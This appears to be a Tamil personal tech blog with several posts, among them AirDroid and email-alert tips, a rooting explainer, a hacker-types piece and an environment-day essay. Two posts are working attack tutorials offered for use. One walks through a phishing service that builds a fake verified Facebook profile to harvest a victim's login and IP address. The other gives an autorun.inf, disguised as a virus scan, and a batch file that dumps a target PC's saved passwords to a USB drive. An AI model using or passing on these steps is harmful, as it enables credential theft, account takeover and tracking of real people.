Blogger Templates

பல இணைய தளங்களிலிருந்து சேகரித்தவைகளை பலருக்கும் பயனாக அமையும் என்ற நோக்கம் கருதி இந்த - Blogல் பதிந்துள்ளேன்

- பொன்.சுதாகர்

Saturday, September 1, 2018

FAKE PROFILE மூலம் FACEBOOK ACCOUNT-ஐ HACK செய்வது எப்படி?

இந்த பதிவில் பார்க்க போவது  நம்முடைய Fake acconut –கு ஒருவர் REQUEST,Messege,Follow செய்வதன் மூலம்  அவருடைய ID&PWD-ஐ Hack செய்ய முடியும்.
இந்த Attack-கும் Phishing முறைதான் ஆனால் நாம் இதற்காக எப்போதும் Online-ல் இருக்கவேண்டிய அவசியம் இல்லை.உங்கள் Computer on –ல் இருக்க வேண்டிய அவசியம் இல்லை.
முன்பு Phishing Attack-ஐ செயல் படுத்த Webhosting&scam page –லாம் தேவைபடும். ஆனால் நான் இப்பொது உங்களுக்கு கூறபோகும் முறையானது எளிமையாகவும் புதியதாகவும் இருக்கும்.
http://shadowave.com/register இந்த Site-ல் register கொள்ளவும்.

பிறகு Log in செய்யவும்.   Log in செய்தவுடன் SCAMS1,SCAM2 என இருக்கும். அதில் நாம் இப்பொது Facebook Profile-english-ஐ select செய்து கொள்வோம்.


  அதில் இப்பொது Cover photo,Profile photo ,name,work என எல்லாவற்றயும் Fill up செய்யுங்கள் கடைசியில் 7வதாக Verified என்ற option  இருக்கும். அதாவது Verified (Blue tick) முக்கிய VIP களின் Original Account –க்கு தரபடுவது அது வேண்டுமானாளும் பயன்படுத்தி கொள்ளலாம். எல்லாம் முடிந்த பிறகு Creat கொடுக்கவும்.



Creat செய்தவுடன் Mypages என்பதற்குள் சென்று பார்தால் ஒரு Link இருக்கும்.

இப்பொது நீங்கள் அந்த link-ஐ Open செய்து பார்த்தால் Original facebook account போலவே இருக்கும். இனி அ ந்த link-ஐ உங்கள் Victim-கு அனுப்பி ADD Friend செய்ய சொல்லுங்கள்.

அவர் Add frnd-ஐ Click  செய்யும் போது Login கேக்கும்.அவர் அ ந்த log in-கொடுக்கும் ID&PWD  எல்லாம்   shadowave site-ல் MyVictims-குள் இருக்கும்.


இதில்  Victims IPaddress கூட கிடைகும் இதன் மூலம் அவர் இருக்கும் இடத்த Trace செய்ய முடியும்.
Left side-ல் Notification காட்டப்படும் அதில் Victim- Total Pages போன்றவை இருக்கும் 
இ ந்த site-ல் Facebook app create செய்தும் Hack செய்யலாம்.
Share:

கணினியைப் பயன்படுத்தி உங்களின் ஸ்மார்ட்போனை கட்டுப்படுத்துவது எப்படி?

நீங்கள் உங்கள் கணினியைப் பயன்படுத்தும் போது ஒவ்வொரு முறையும் தனியாக உங்கள் ஸ்மார்ட்போனைப் பயன்படுத்துவதற்கு சோர்வாக இருந்தால், உங்களுக்கு உதவ இதோ எளிய வழிமுறைகள். 

Image result for airdroid

இந்த வழிமுறைகளை முடித்துவிட்டால், இனிமேல் உங்கள் கணினி அல்லது மடிக்கணினி தனியாக மற்றும் உங்கள் ஸ்மார்ட்போனை தனியாக என கட்டுப்படுத்த வேண்டிய அவசியமே இருக்காது. கணினி பயன்பாட்டின்போது பல நேரங்களில் நீங்கள் உங்கள் போனை அணுக முடியாமல் போகும் பல சூழ்நிலைகள் ஏற்படும். அந்த சூழ்நிலைகளை அப்படியே மறந்துவிட்டு இரண்டு சாதனங்களையும் (கணினி - ஸ்மார்ட்போன்) ஒன்றாக இணைத்து பெரிய திரையில் உள்ளடக்கத்தை காணுங்கள், டைப் செய்யுங்கள் மற்றும் கட்டுப்படுத்துங்கள்.

உங்கள் கணினியில் இருந்து நீங்கள் உங்கள் ஆண்டராய்டு ஸ்மார்ட்போன் அணுகவும் மற்றும் அதே சமயம் அதை கட்டுப்படுத்தவும் பல ஆண்ட்ராய்டு பயன்பாடுகள் உள்ளன. மற்றும், அவைகளில் சிறப்பாக செய்லபடும் ஒரு ஆப் தான் - ஏர்ட்ராயட் (AirDroid), இதனை கொண்டு உங்கள் கணினி உதவியுடன் உங்கள் ஸ்மார்ட்போன் கட்டுப்படுத்த ஒரு விரைவான மற்றும் எளிதான தீர்வு உங்களுக்கு கிடைக்கும். இந்த பயன்பாட்டைப் பயன்படுத்த, உங்கள் தொலைபேசி மற்றும் கணினி இரண்டிலுமே ஒரே நெட்வொர்க் கொண்டு இணைக்கப்பட வேண்டும் என்பதை நினைவில் 

ஏர்ட்ராயட் என்றால் என்ன? 

ஏர்ட்ராயட் என்பது ஸ்மார்ட்போனின் பொதுவான அம்சங்களை டெஸ்க்டாப் வழியாக அணுகலை வழங்கும் பல திரை பயன்பாடு ஆகும். இதில் சுவாரஸ்யமான விஷயம் என்னவென்றால், ஏர்ட்ராயட் உதவியுடன் கணினியைப் பயன்படுத்தி உங்கள் ஸ்மார்ட்போனைக் கட்டுப்படுத்த ஒரு கணக்கை உருவாக்க வேண்டிய அவசியமில்லை என்பதுதான்.
Image result for airdroid


இந்த பயன்பாடு விண்டோஸ் மற்றும் மேக் தளங்களுக்கு இணக்கமானது. நீங்கள் முக்கிய வலை உலாவிகளில் எந்த வழியாகவும் எந்த மேடையிலும் இதை பயன்படுத்த முடியும்.
தொடக்கத்தில், உங்கள் ஆண்டராய்டு ஸ்மார்ட்போனில் இந்த பயன்பாட்டைப் பதிவிறக்கவும். பின்னர், web.airdroid.com என்ற வகைத்தளத்தை உங்கள் டெஸ்க்டாப் உலாவியின் வழியாக திறக்கவும்.

ஒரு விண்டோ க்யூஆர் குறியீடு பாப் அப் ஆகும். உங்கள் தொலைபேசியில் திறந்திருக்கும் ஏர்ட்ராய்டு ஆப்பை திறந்து அந்த குறியிட்ட க்யூஆர் குறியீட்டை ஸ்கேன் செய்வதற்கு திரையின் மேல் உள்ள ஸ்கேன் ஐகானைக் கிளிக் செய்யவும். நீங்கள் ஒரு கணக்கு வைத்திருந்தால், உள்நுழைவதை டாப் செய்யலாம். இல்லையெனில் நீங்கள் ஒரு கணக்கு இல்லாமல் இணைக்கப்படலாம்.



இந்த ஆப்பை நீங்கள் மூன்றாம் தரப்பு பயன்பாடுகளுடன் பயன்படுத்த முடியாது. இங்கித பயன்பாட்டு ஐகான் நீங்கள் நிறுவ மற்றும் பயன்பாடுகளை நிறுவல்நீக்கம் செய்ய அனுமதிக்கிறது. இந்த பயன்பாடு செயல்பாட்டிற்கு வரும்போது, அழைப்புகள் செய்யலாம், எஸ்எம்எஸ் அனுப்பலாம், படிக்கலாம், போனில் புகைப்படங்களையும் வீடியோக்களையும் பார்க்கலாம் மற்றும் இசை கேட்கலாம்.


சுவாரஸ்யமாக, நீங்கள் உங்களின் ஸ்மார்ட்போன் கேமராவை தொலைவிலிருந்து கட்டுப்படுத்தலாம். தொலைபேசி மற்றும் கணினிக்குள் தொலைவிலிருந்து கோப்புகளை இடமாற்றம் செய்ய முடியும். டெஸ்க்டாப்பில் ஒரு யூஆர்எல்-ஐ உள்ளிட்டால், குறிப்பிட்ட வலைப்பக்கம் உங்கள் ஸ்மார்ட்போனில் திறக்கப்படும். தொலைநிலையில் கட்டுப்பாடுகள் நிகழ்த்த உங்கள் தொலைபேசியில் ஏபிகே கோப்புகளை நீங்கள் நிறுவலாம்.
Share:

புதிய ஈமெயில்களை SMS -இல் பெறுவது எப்படி?



மின்னஞ்சல் பயன்படுத்தும் போது நமக்கு அடிக்கடி வரும் பிரச்சினை நமக்கு வரும் ஈமெயில்களை உடனடியாக நம்மால் அறிய முடியாதது. எப்போதும் ஆன்லைனில் இருக்க முடியாத காரணத்தால் இந்த பிரச்சினை நமக்கு வரும். இதே புதிய ஈமெயில் நமக்கு வந்துள்ளது என்பது SMS மூலம் அறிய முடிந்தால்? எப்படி என்று பார்ப்போம். 

1. முதலில் way2sms என்ற தளத்துக்கு செல்லுங்கள். http://site23.way2sms.com/content/index.html?

2. ஏற்கனவே அக்கௌன்ட் இருப்பின் Sign-in செய்யுங்கள் இல்லை என்றால் புதிய அக்கௌன்ட் தொடங்கவும். 

3. உள்ளே நுழைந்த உடன் "Mail Alert" என்பதை கிளிக் செய்யவும்.

4. இப்போது Forward your mails to என்பதற்கு நேரே உள்ள முகவரியை Copy செய்து கொள்ளவும். 

5. இப்போது உங்கள் ஜிமெயில் கணக்கில் நுழைந்து Settings >> Forwarding and POP/IMAP என்பதில் "Add a forwarding address" என்பதை கிளிக் செய்து முன்னர் Copy செய்த முகவரியை இதில் தரவும். 

6. இப்போது உங்கள் Mobile க்கு ஒரு SMS வரும். அதில் Confirmation Code இருக்கும். இல்லை என்றால் Way2sms-இல் Mail Alert பகுதியில் Inbox 123456@way2sms.com என்பதை கிளிக் செய்தால் வரும். எதுவும் வரவில்லை என்றால் ஜிமெயிலில் Resend email என்பதை கிளிக் செய்யவும். 

7. இப்போது நீங்கள் பெற்ற Code-ஐ ஜிமெயிலில் Forwarding and POP/IMAP பகுதியில் தர வேண்டும். தந்த உடன் கீழே உள்ளது போல மாற்றிக் கொள்ளுங்கள். 

8. அவ்வளவு தான் இனி புதிய ஈமெயில்கள் உங்களுக்கு மொபைலில் Alert ஆக வந்து விடும். யாரிடம் இருந்து ஈமெயில் மற்றும் Subject போன்றவை அதில் வரும். நீங்கள் மீண்டும் இணைய இணைப்பை பயன்படுத்தி உடனடியாக ஈமெயில்க்கு பதில் அளித்து விடலாம்.

Share:

ANDROID ROOTING என்றால் என்ன?


Image result for ANDROID ROOTING

முதலில் Android mobile-ஐ root செய்வதற்கு முன் அதை பற்றி தெரிந்து கொள்வோம். Android OSஆனது Linux-ன் அடிப்படையில் கட்டமைக்கப்பட்டது(Build)
Linux OS எந்தது open source எனவே யார் வேண்டுமானலும் linux-ல் தேவையான மாற்றங்களை[Develop] செய்து கொள்ளலாம் அதை வெளியிடலாம். அவ்வாறு உருவாக்கப்பட்டதுதான் Android.. J. linux-ல் root directory- என்பது இதயம் போன்ற பகுதி அதில் அதான் OS-ன் அனைத்து directoryகளும் அதன் sub-directoryகளும் இருக்கும். இதில் தான் security –யும் இருக்கும். அதாவது இங்கு security என கூறப்படுவது என்னவென்றால் ஒவ்வொரு Mobile Company-யும் தனது  Mobile-ல்
இந்த அளவு தான் USE செய்ய வேண்டும் என்று விதிமுறை வைத்திருப்ப்பார்கள். அந்த விதிமுறையை வைக்ககாரணம் நமது பாதுகாப்பிற்காக. ஆனால்


அதன் security-ஐ தகர்பதன் [ROOT]  மூலம்  உங்கள் Android Mobile-ல் Super User Access-ஐ பெறமுடியும். இந்த Super User Access- மூலம் உங்கள் Mobile-ல் என்ன வேண்டுமாணாலும் செய்ய முடியும்.(
உதாரனமாக ஒரு 2 வருடத்திற்கு முன்பு Android mobile-ல் screen record செய்யமுடியாது. அதனால் பலர் screen record option தேவை என்று Root செய்தார்கள் .ஆனால் இன்று[5.0<] screen record செய்ய Root  தேவையில்லை.

இதைப்போல் நமக்கு தேவையான காரியங்களை செய்து கொள்ள Root-செய்து கொள்ளலாம்.

தீமைகள்
1 Root செய்வதால் உங்கள் Mobile-க்கு warranty  கிடையாது
2 hackers-ன் எளிமயான Traget-ஆக உங்கள் Mobile இருக்கும். அது எப்படி
என்று கேட்டால்? Hackers பொதுவாக Android mobile-ஐ hack செய்ய RAT –என்ற போலியான apps-ஐ பயன் படுதுவார்கள் .அந்த RAT  உங்களின் ஒவ்வோரு அசைவையும் Hacker-க்கு காட்டி கொடுக்கும். Camera shot,calling msg போன்றவை.

RAT என்பது Remote Administration Tool இது Trojan  போன்ற virus இதை நீங்கள் அதிகமாக பயன்படுத்தும் app-ல் Binding செய்து கொடுத்துவிடுவார்கள்.
அவ்வாறு கொடுக்கப்படும் app-ஐ பயன் படுதுவதன் மூலம் நீங்கள் Hack செய்யப்படலாம்.
நீங்கள் Root செய்யமல் இருந்தால் உங்கள் Mobile அ ந்த app-ஐ install செய்யும் போது unkown source என்று தடுத்துவிடும்.(ஆனால் தற்போது உள்ள Mobile கள் unkown sorce-ஐ allow செய்கின்றன)
3 Mobile rooting ஆகி கொண்டுருக்கும் போது எந்த வேலையும் செய்யககூடாது(songs etc..) அப்படி எதாவது செய்தால் Mobile வீணாகிவிடும்.
4 “Overclocking “   overclock என்பது Mobile-ன் processor-ஐ வேகப்படுத்தும் செயல்முறை ஆகும். இதனால் வரும் பிரச்சனை என்ன வேண்றால் Mobile வழக்கத்தை விட வேகமாக செயள்படுவதால் Repair ஆகலாம்.
5 Applications உங்கள் போனில் இயங்க மறுக்கும்

நன்மைகள்:
1 Battery life-ஐ அதிகரிக்க CPU-ன் process குறைக்கலாம்.(underclock)
2CPU-ன் வேகத்தை அதிகரிக்க முடியும்(Overclocking)
3 pre installed apps-ஐ நீக்க முடியும்.
4 Custom ROM வசதி நமக்கு கிடைக்கும் இதன் மூலம் உங்கள் Mobile-ன் default option-ஐ மாற்ற முடியும்.
5 titanium backup-ஐ பயன்படுத்த முடியும்.


Share:

HACKER ஆவது எப்படி?

முதலில் Hacking கற்று கொள்வதற்கு முன்பு Hackers-ன் வகைகளை(type) தெரிந்துகொள்ள வேண்டும்.
Video Reference : https://youtu.be/Jsr2ueJdQLo


Hackers Type
Blackhat Hacker
Whitehat Hacker
Greyhat Hacker
Script kidde hackers


Blackhat Hackers

 இவர்கள் Hacking-தொழிலாக செய்து பணத்தினை சம்பாதிக்க கூடியவர்கள்.
அதாவது Carding,spamming,phishing , website-ஐ hack செய்வது போன்றவற்றின் மூலம்  பணத்தினை சம்பாதிப்பார்கள் இவர்கள் தங்களது Hacking திறமைகளை தவறாக பயன்படுத்துபவர்கள்.

Whitehat hacker
 இவர்கள் Companyகளில் வேலை செய்யகூடிய security engineer இவர்கள் தங்களது hacking திறமைகளை சொந்த Company network களில் pentest(Hack)செய்து அவற்றில் உள்ள loop holes-ஐ(பாதுகாப்பு குறைபாடு) சரிசெய்பவர்கள்.
இவர்கள் தங்களது திறமைகளை நல்ல செயல்களுக்கு பயன்படுத்தக்கூடியவர்கள்.

Greayhat hacker
இவர்கள் தங்களது திறமைகளை நல்லது & கெட்டது ஆகியவற்றிக்கு பயன்படுத்தக்கூடியவர்கள். தங்களது Company-ல் வேலை செய்யும் போது Whitehat ஆகவும். இரவு நேரங்களில் Blackhat ஆகவும் செயல்படக்கூடியவ்ர்கள்.
script kiddie
மேற்கூறிய 3வகை Hackers-ம் தாங்கள் சொந்தமாக Tools-ஐ உருவாக்க தெரிந்தவர்கள். ஆனால் இந்த Script kidde-க்கு Tools-ஐ உருவாக்க தெரியாது,அந்த 3வகை Hacker- உருவாக்கிய Tols-ஐ பயன் படுத்தக்கூடியவர்கள்.

PC with net connection
ஒரு நல்ல Computer தேவை காரணம் அப்போது தான், process வேகமாக நடக்கும். நல்ல internet connection தேவை காரணம், DDOS போன்ற Attack-க்கு வேகமான Connection தேவை.
Computer language
C & C++ போன்றவை கற்று கொள்ளவேண்டும்
OS[linux]
மேலும் அனைத்து வகையான OS-யும் பயன்படுத்த தெரிய வேண்டும். [windows,linux]

Networking
Networking Hacking-க்கு மிக முக்கியமன ஒன்று அதையும்
கற்றுக் கொள்ளவேண்டும்.

Books
Hacking சம்மந்தமான நிறைய Books online-ல் கிடைக்கிறது அவற்றை படிப்பதன் மூலம் Hacking திறமை வளரும்.

Self interest
இது நமக்குள்ளே இருக்ககூடிய ஈடுபாட்டின் மூலம் தான் கற்றுகொள்ள முடியும்.ஈடுபாடு இல்லையென்றால் கற்று கொள்ளமுடியாது.  

0day exploit
ஒவ்வொறு நாளும் loop holes-ன்(server,systems,etc) விவரம் அடங்கிய பதிவு  0day exploit வெளிவரும்,அதனால் அவற்றையும் நாம் தெரிந்து  கொள்வது அவசியம்

Database skills
அனைத்து வகையான Database-ஐ பற்றியும் தெரிந்து கொள்ளவேண்டும்
Scripting
Python, ruby  போன்ற Scripting language –ஐ கற்ருகொள்ள வேண்டும்.
Attacking techniques
Attacking techniques  என்பது
Phishing
Spamming
Brutforce
போன்ற attack-ஐ பற்றி தெரிந்து கொள்வதன் மூலம் நீங்களும் Hacker ஆகலாம்.


Share:

Phishing என்றால் என்ன?

Related image
Phishing என்றால் ஏமாற்றல் என்றும் கூறலாம். அதாவது பயனர் (USER) களுக்கு உண்மையானதற்கு பதிலாக பொய்யான ஒன்றை காட்டி ஏமாற்றும் முறை. இன்று உலகலாவிய ரீதியில் அனைவரும் E-mail, Social Networks, Banking போன்றவற்றை ஹக் செய்ய பயன்படுத்துவது இம்முறையைத்தான். இதற்காக நமக்கு தெரிந்திருக்க வேண்டியது PHP / HTML போன்றவற்றின் சிறியதொரு அறிவுதான்.

Share:

Pen drive மூலம் Password Hack செய்வது எப்படி?



Pen Drive கொண்டு Passwords Hack செய்ய 100 % பயன் தரும் சிறந்த வழி
மிகவும் அதிகமாய் பேசாமல் நேரா விஷயத்துக்கே
போவோம்.
01. முதலில் இதனை Download செய்துகொள்ளுங்கள்
Image result for pen drive
02. அவற்றை USB Drive கு Copy செய்துகொள்ளுங்கள்
02. பிறகு Notepad திறந்து
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
என டைப் செய்துகொள்ளுங்கள். அதனை Autorun.inf என (.inf என்று முடியுமாறு) USB Drive இனுள் save செய்துகொள்ளுங்கள்.
03. பிறகு மீண்டும் Notepad திறந்து
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
என டைப் செய்துகொள்ளுங்கள். அதனை . Lunch.bat என (.bat என்று முடியுமாறு) USB Drive இனுள் save செய்துகொள்ளுங்கள்.
04. அவ்வளவுடன் நிறுத்திகொள்ளாமல் நீங்கள் hack செய்யவேண்டிய Pc இல் உங்கள் usb ஐ Plug செய்து வரும் Autorun இல் Perform a Virus Scan என்பதை அழுத்துங்கள்.
“”””அப்பறம் பாருங்க, 5 seccond கு பிறகு அவரின் Passwords எல்லாம் Txt வடிவில் உங்கள் Usb இல் இருக்கும் “””””
Share:

Monday, June 5, 2017

உலக சுற்றுச் சூழல் தினம்



உலக சுற்றுச் சூழல் தினம்

ஒவ்வொரு ஆண்டும் ஜூன் 5ம் தேதி உலக சுற்றுச் சூழல் தினமாக (World Environment Day) கொண்டாடப்படுகிறது. 2017ம் ஆண்டுக்கான உலக சுற்றுச் சூழல் தினத்தை "Connecting People to Nature - இயற்கை மக்களை இணைக்கும்" என்ற கருப்பொருளின் அடிப்படையில் கொண்டாட வேண்டும் என ஐக்கிய நாடுகள் சபை தெரிவித்துள்ளது. இந்த நாளை சுற்றுச் சூழல் குறித்த விழிப்புணர்வை ஏற்படுத்தும் ஒரு தினமாக ஐக்கிய நாடுகள் பயன்படுத்தி வருகின்றன. அரசியல் கவனத்தையும் மற்றும் செயல்முறைகளையும் அதிகரிக்கவும் இந்த நாள் பயன்படுகிறது. உயிர்களின் வாழ்க்கை தொடர்பாக பல்வேறு சுற்றுச் சூழல் பிரச்சினைகளுக்கு மனிதரை எதிர்கொள்ளச் செய்வதும் உலக சுற்றுச் சூழல் பிரச்சினைகளுக்கும் சுற்றாடல் கல்விக்கும் அழுத்தம் கொடுப்பதும், சுற்றுச் சூழல்லைப் பேணுவதில் விழிப்புணர்வை ஏற்படுத்துவதும் இத்தினத்தின் பிரதான நோக்கமாகும். 1972இல் சுவீடனின் தலைநகரான ஸ்ரொக்ஹோமில் நடைபெற்ற ஐக்கிய நாடுகள் சபையின் மனித குடியிருப்பும், சுற்றாடலும் என்ற வரலாற்றுப் புகழ்மிக்க உலக மாநாட்டில் உலக சுற்றுச் சூழலின் முக்கியத்துவம், இயற்கை வளங்கள், அதன் பிரயோகம் என்பன பற்றி கலந்துரையாடப்பட்டது. முடிவில் ஜுன் 5ஆம் திகதியை உலக சுற்றுச் சூழல் (World Environment Day) தினமாக பிரகடனப்படுத்தும் தீர்மானம் மேற்கொள்ளப்பட்டது. இத் தினத்தின் கொண்டாட்டங்களுக்குப் பொறுப்பாக ஐக்கிய நாடுகள் சூழல் திட்டம் (UNEP) செயற்படுகின்றது. இயற்கை வளங்களான நீர்நிலைகள், காடுகள், வனாந்திரங்கள், வனசீவராசிகள், வளிமண்டலம், பறவைகள், சோலைகள், கடற்கரைகள் அனைத்தும் மனித குலத்துக்காக வடிவமைக்கப்பட்ட பொக்கிசங்களாகும். மனிதகுலம், விலங்கினம், பறவையினம், தாவரங்கள், கடல்வாழ் உயிரினங்கள் போன்றவற்றின் நல்வாழ்வு இந்த சுற்றுச் சூழலின் சமநிலையிலேயே தங்கியுள்ளது. இச்சமநிலையில் ஏற்படும் மாற்றங்கள் சுற்றுச் சூழலை மட்டுமன்றி, உயிரினங்களின் வாழ்வுக்கும் அச்சுறுத்தலாகவும் ஆபத்தாகவும் அமைந்து விடுகின்றது. நவீன விஞ்ஞான, தொழில்நுட்ப, கைத்தொழில்துறை வளர்ச்சியின் காரணமாக சுற்றுச் சூழல் மாசடைகிறது. இரசாயனக் கழிவுகள், புகை என்பன நீர் நிலைகள், வளிமண்டலம் என்பவற்றை மாசுபடுத்துவதால் உயிரினங்களுக்கு ஆபத்தாக அமைகிறது. சுற்றுச் சூழலை மனிதன் பாதூக்கவே கடமைப்பட்டவன். நினைத்தவாறு அவற்றை அனுபவிக்கும் உரிமையைக் கொண்டவனல்ல. சுற்றுச்சூழலைப் பேணிப்பாதுகாக்க வேண்டிய அவசியத்தை உணர்ந்து செயற்படத் தவறியதன் விளைவுகளை மனிதகுலம் இப்போது தாராளமாக அனுபவிக்கத் தொடங்கிவிட்டது. ஒருபுறத்தில் வரட்சி மறுபுறத்தில் வெள்ளக்கொடுமையும் சூறாவளியும் என்று இயற்கையின் அனர்த்தங்கள் சுழற்சியாக வந்து கொண்டேயிருக்கின்றன. மேற்குலகில் சூழலியல் அரசியலின் முக்கியமானதொரு அம்சமாகியுள்ள காரணத்தினால் பசுமைக்கட்சிகள் தோற்றம் பெற்று பாராளுமன்ற ஆசனங்களையும் கைப்பற்றி மனிதருக்கும் சுற்றுச் சூழலுக்கும் இடையிலான நெருக்கமான பிணைப்புப் பற்றி மக்கள் மத்தியில் கூடுதல் விழிப்புணர்வு உருவாகுவதற்கு பெரும் பங்களிப்பைச் செய்து வந்திருக்கின்றன. மரங்களுக்கும் மனிதர்களுக்கும் இடையிலான உறவு மிகவும் முக்கியமானதாகும். மனிதனின் இருப்புக்கு மரங்கள் அத்தியாவசியம் என்பதைப் பலரும் உணருவதில்லை. மரங்கள் இல்லையெனில் நாம் இறந்துவிடுவோம். இதனாலேயே சுற்றுச் சூழலியலாளர்கள் மரங்கள் தறித்து வீழ்த்தப்படுவதற்கு எதிராகப் பெரும் இயக்கங்களை முன்னெடுத்து வந்திருக்கிறார்கள். மனிதர்களினால் செய்யப்படக்கூடிய மிகவும் மூர்க்கத்தனமான செயல்களில் ஒன்று மரங்களையும் காடுகளையும் அழித்து அதன் மூலம் பூமியை ஒரு பாலைவனம் ஆக்குவதுதான். பாதுகாக்கப்பட்ட சில பகுதிகளையும் எட்டுவதற்கு கடினமான இடங்களையும் விட்டால் இந்த வனப்புமிகு முதுசத்தின் பெரும்பகுதி இப்போது இழக்கப்பட்டுவிட்டது. எஞ்சியுள்ள காடுகளும் மிகவும் மோசமாகச் சீரழிக்கப்பட்டு வருகின்றன. மனித அபிவிருத்திற்காகவும், அடுத்த சந்ததிக்காகவும் இயற்கை வளங்களை மனிதன் திட்டமிட்டு பேண வேண்டிய பொறுப்புடையவன். சுற்றாடலும் அபிவிருத்தியும் ஒரு நாணயத்தின் இரு பக்கங்களைப் போன்றன. புவி வெப்பமடைந்து வருவதும் ஓசோன் படையில் ஓட்டை விழுந்துள்ளது என்ற தகவலும் சுற்றுச் சூழலின் சமநிலையில் ஏற்பட்ட பாரிய விளைவுகளாகும். மேலும் சுற்றுச் சூழல் தொடர்பாக காலநிலை மாற்றம், புவிக்கோளம் உஸ்ணமடைதல், ஓசோன் படை பாதிப்பு, நன்னீர் வளம், சமுத்திரம், கடற்கரைப் பிரதேசங்கள், காடழிப்பு, வனாந்திரமாக்கல், உயிரியல் மாறுபாடு , உயிரியல் தொழில்நுட்பம், சுகாதாரம், இரசாயன பாதுகாப்பு போன்றவை கவனம் செலுத்தப்படவேண்டியுள்ளது. சுற்றுச்சூழல் பாதுகாப்பு அக்கறை என்பது சில நிபுணர்கள் மாத்திரம் நட்சத்திர ஹோட்டலில் கருத்தரங்குகளை நடத்தி விவாதிக்கும் ஒரு விவகாரம் என்று இன்னும் கூட பலர் நினைக்கிறார்களோ என்று வியக்கவேண்டியிருக்கிறது. சுற்றுச் சூழலியலாளர்களின் பணிகள் காரணமாக அண்மைய சில ஆண்டுகளாக பிறந்த சுற்றுச் சூழலைப்பற்றி மக்கள் மத்தியில் ஓரளவுக்கு உணர்வு காணப்படுகின்ற போதிலும், அரசியல் தலைமைத்துவங்கள் இதுவிடயத்தில் போதியளவு அக்கறை காண்பிக்காததால் கணிசமான முன்னேற்றம் ஏற்படுவதற்கு வாய்ப்பிருக்கவில்லை.
Share:

என்னை பற்றி...

My photo
Am Working as Assistant Professor in the Department of Information Technology at Sri Sairam Institute of Technology, Chennai.

முக்கிய செய்திகள்...

நாள்காட்டி

வானிலை



IP and Flag Counter

Wikipedia

Search results

QR Code Generator

All Conversion Widget

Recent Posts

Copyright © பொன். சுதாகர் | Powered by Blogger
Design by SimpleWpThemes | Blogger Theme by NewBloggerThemes.com & Distributed By Bloggertemplates4u